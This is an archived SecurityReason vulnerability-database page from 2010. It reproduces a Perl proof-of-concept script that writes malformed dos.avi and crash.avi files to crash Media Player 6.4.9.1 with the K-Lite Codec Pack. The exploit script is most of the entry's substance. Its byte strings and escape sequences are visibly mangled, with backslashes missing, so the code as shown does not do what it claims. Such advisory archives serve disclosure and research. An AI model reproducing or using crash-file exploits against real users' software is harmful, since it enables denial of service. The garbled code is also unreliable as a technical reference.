SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow World Laboratory of Bugtraq Database

Arrow  Topic :

Media Player version 6.4.9.1 with K-Lite Codec Pack denial of service


Arrow  WLB : WLB-2010030068  (About)
Arrow  SecurityAlert : None
Arrow  Date : 2010-03-16
Arrow  Credit          : En|gma7
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote : No
Arrow  Local     : Yes
Arrow  Status   : Bug

Arrow  History : [2010-03-16] Started

Arrow  Affected software :  Media Player version 6.4.9.1 with K-Lite Codec Pack



Arrow  Text :  

# Exploit Title: Media Player V6.4.9.1 with K-Lite Codec Pack DoS/Crash
(.avi file)
# Date: 14/3/2010
# Author: En|gma7
# Software Link: http://www.free-codecs.com/K_lite_codec_pack_download.htm
# Version: Media Player V6.4.9.1 with K-Lite Codec Pack 5.8.0
# Tested on: WinXP/Vista
# CVE : [if exists]
# Code :

#!/usr/bin/perl

# dos.avi work on windows XP with all SP
#crash.avi work on WinXP/Vista

print "
[~] Media Player V6.4.9.1 with K-Lite Codec Pack 5.8.0 DoS/Crash (.avi
file)
[~] EN|GMA7 Team ~
[~] By Zaid
[~]
www.enigma7.net<http://www.enigma7.net><http://www.enigma7.net>

";


$bf = "x4Dx54x68x64x00x00x00x06x00x00x00x00x00x00";
$crash = "x4Dx54x68x64x00x00x00x06";

open(file, "> dos.avi");
print (file $bf);
open(file, "> crash.avi");
print (file $crash);
print "nn[+] Done!n
[+] dos.avi and crash.avi created..n
[+] Z-at-Enigma7.netn";






Audyt bezpieczeństwa

Security Audit

Analiza powłamaniowa

Arrow  References :  

None

If you want change this note, please use UCP



Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

Copyright © SecurityReason.com. All Rights Reserved.